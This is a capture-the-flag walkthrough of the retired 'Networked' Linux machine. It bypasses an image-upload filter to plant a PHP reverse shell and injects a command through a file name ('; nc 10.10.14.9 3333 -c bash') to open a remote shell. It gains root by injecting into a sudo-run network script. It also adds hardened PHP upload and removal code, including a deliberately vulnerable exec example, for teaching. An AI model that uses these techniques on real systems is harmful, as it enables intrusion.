The Networked machine is a retired Linux machine.
First, we identify the target by scanning it over the network.
Classic scan
Full TCP port scanning
Full UDP port scanning
The scan shows that the SSH and HTTP ports are open.
Since Apache is serving HTTP, we open the site in the browser.
The page itself contains little, only some plain text.
We review the page source.
upload and gallery not yet linked
This comment line may be a clue.
Next we enumerate directories, using the gobuster tool.
Browsing the directories it finds, we see that the /backup directory contains files.
We download the backup.tar file from that directory to our machine and inspect its contents.
Since the archive contains PHP files, we check whether the same files also exist on the web server.
photos.php shows a few sample images; nothing of interest appears in its source.
upload.php looks more promising 🙂
Here we tried to upload the PHP reverse shell prepared by pentestmonkey (https://github.com/pentestmonkey/php-reverse-shell). The upload was rejected with the error “Invalid image file”, so PHP files are not accepted as-is.
We used Burp Suite to intercept the request and try bypass methods. (See the separate blog posts on how to intercept requests with Burp Suite.)
With Burp Suite intercepting the request:
1. We changed the extension in “filename=” to .gif
2. We changed “Content-Type:” to the GIF type
3. We added the GIF file header to the file
After making these changes we forwarded the request.
On the photos.php page we now see the file we uploaded.
Checking the listener we left running in the background, we have a reverse shell.
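Each of the three changes above defeats a check that trusts something the client controls: the filename extension, the Content-Type header, and the first bytes of the file. The handler below is an added example of how such an upload endpoint can be hardened; it is not the machine’s own upload.php, and the form field name, the storage directory and the size limit are assumptions. The type decision is taken from the bytes on disk, the image is decoded and re-encoded so that only pixel data survives, and the stored name is generated by the server.

```php
<?php
declare(strict_types=1);

// Hardened image upload handler (added example; not the Networked machine's upload.php).
// Assumptions: the form field is "image", UPLOAD_DIR exists, is writable by the
// web server, and is NOT under the document root, so nothing stored there is
// ever executed or served directly by PHP.
const UPLOAD_DIR = '/var/www/uploads_store';   // assumed path
const MAX_BYTES  = 2 * 1024 * 1024;            // assumed limit

// Allowed image types, keyed by the type PHP detects from the file's bytes.
const ALLOWED = [
    IMAGETYPE_GIF  => 'gif',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
];

function reject(string $reason): void
{
    http_response_code(400);
    echo htmlspecialchars($reason, ENT_QUOTES, 'UTF-8');
    exit;
}

if (!isset($_FILES['image']) || $_FILES['image']['error'] !== UPLOAD_ERR_OK) {
    reject('Upload failed');
}
$tmp = $_FILES['image']['tmp_name'];

// 1. Size limit before any parsing.
if (filesize($tmp) > MAX_BYTES) {
    reject('File too large');
}

// 2. The type comes from the file contents, never from the client's filename
//    or Content-Type header, both of which the client sets freely.
$info = getimagesize($tmp);
if ($info === false || !isset(ALLOWED[$info[2]])) {
    reject('Invalid image file');
}
$ext = ALLOWED[$info[2]];

// 3. A valid header is not proof of a benign file: a GIF signature can be
//    followed by arbitrary text. Decode and re-encode the image so that only
//    pixel data is written out and anything appended or embedded is dropped.
$img = @imagecreatefromstring((string) file_get_contents($tmp));
if ($img === false) {
    reject('Invalid image file');
}

// 4. Server-generated name with an extension chosen by the server: the
//    client's filename is never used for anything.
$dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
$ok = match ($ext) {
    'gif' => imagegif($img, $dest),
    'jpg' => imagejpeg($img, $dest, 85),
    'png' => imagepng($img, $dest),
};
imagedestroy($img);
if (!$ok) {
    reject('Could not store image');
}

echo 'Stored as ' . htmlspecialchars(basename($dest), ENT_QUOTES, 'UTF-8');
```

The re-encoding step is what makes the extension and Content-Type tricks irrelevant: even a file that passes the signature check leaves only a fresh image behind, and the storage location means a stored file is never handed to the PHP interpreter. Requires the GD extension.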
We enumerate the system for any information that could let us gain more privileges.
Here, what the box wants us to find is a weakness on the source code side, and the check_attack.php and crontab.guly files caught our attention. check_attack.php defines
$path = '/var/www/html/uploads/';
and $value is the name of the suspicious file.
We can create a file in /var/www/html/uploads whose name holds the payload: the name starts with a semicolon (to end the original command and inject a new one), followed by a reverse shell command.
We use the command touch '; nc 10.10.14.9 3333 -c bash' to get the reverse shell.
We catch the connection with the netcat listener running in the background.
This gives us the user flag.
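The injection works because the file name is handed to a shell as part of a command string. The block below is an added example reconstructing that pattern and showing how to remove it; it is not the machine’s actual check_attack.php, and the exact command the original runs on $path . $value is an assumption (only the $path definition and the role of $value are taken from the write-up). The safe version never reaches a shell at all, and the variant that still needs one passes the name as a single quoted argument.

```php
<?php
declare(strict_types=1);

// Added example around the check_attack.php pattern from the write-up; not the
// machine's own code. $path is as given there; everything else is assumed.
$path = '/var/www/html/uploads/';

// Returns true when $value is a single, plain file name: letters, digits,
// dot, dash and underscore, not starting with a dot, no separators or spaces.
function is_safe_name(string $value): bool
{
    return preg_match('/^[A-Za-z0-9_-][A-Za-z0-9._-]{0,254}$/', $value) === 1;
}

// VULNERABLE (assumed shape of the original): the file name is interpolated
// into a shell command string, so ';' and anything after it become a second
// command, executed with the privileges of the cron user running this script.
function remove_unsafe(string $path, string $value): void
{
    exec("rm -f $path$value");
}

// HARDENED: no shell. Validate the name, resolve it, confirm the result still
// lives inside $path (realpath normalises symlinks and fails on missing files),
// and unlink it directly.
function remove_safe(string $path, string $value): bool
{
    if (!is_safe_name($value)) {
        return false;
    }
    $base = realpath($path);
    $full = realpath($path . $value);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return unlink($full);
}

// If a shell really is required (for example to detach the removal with
// nohup), escapeshellarg() makes the whole path a single quoted argument, so
// metacharacters in the name can no longer terminate the command.
function remove_safe_shell(string $path, string $value): void
{
    if (!is_safe_name($value)) {
        return;
    }
    exec('/bin/rm -f ' . escapeshellarg($path . $value));
}

// Example driver (assumed): walk the upload directory and apply the safe path.
foreach (scandir($path) ?: [] as $value) {
    if ($value === '.' || $value === '..') {
        continue;
    }
    if (!is_safe_name($value)) {
        error_log("skipping file with unexpected name in $path");
        continue;
    }
    remove_safe($path, $value);
}
```

The allow-list check is the part worth keeping even where the rest differs: a name containing ';', whitespace or a path separator is rejected before any command or file operation sees it, which also closes the path-traversal variant of the same bug.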
Next, we enumerate from the shell we obtained to look for a privilege escalation path.
The sudo -l command lists the binaries we can run as root.
Here we find the file /usr/local/sbin/changename.sh.
We read the contents of this file with cat.
This script creates a network script for an interface called guly and then brings that interface up. It prompts the user for the following options: NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO.
We are only interested in the NAME option, because a command can be injected through the interface name. Let’s try running bash.
We get root, and from here we can read the root flag.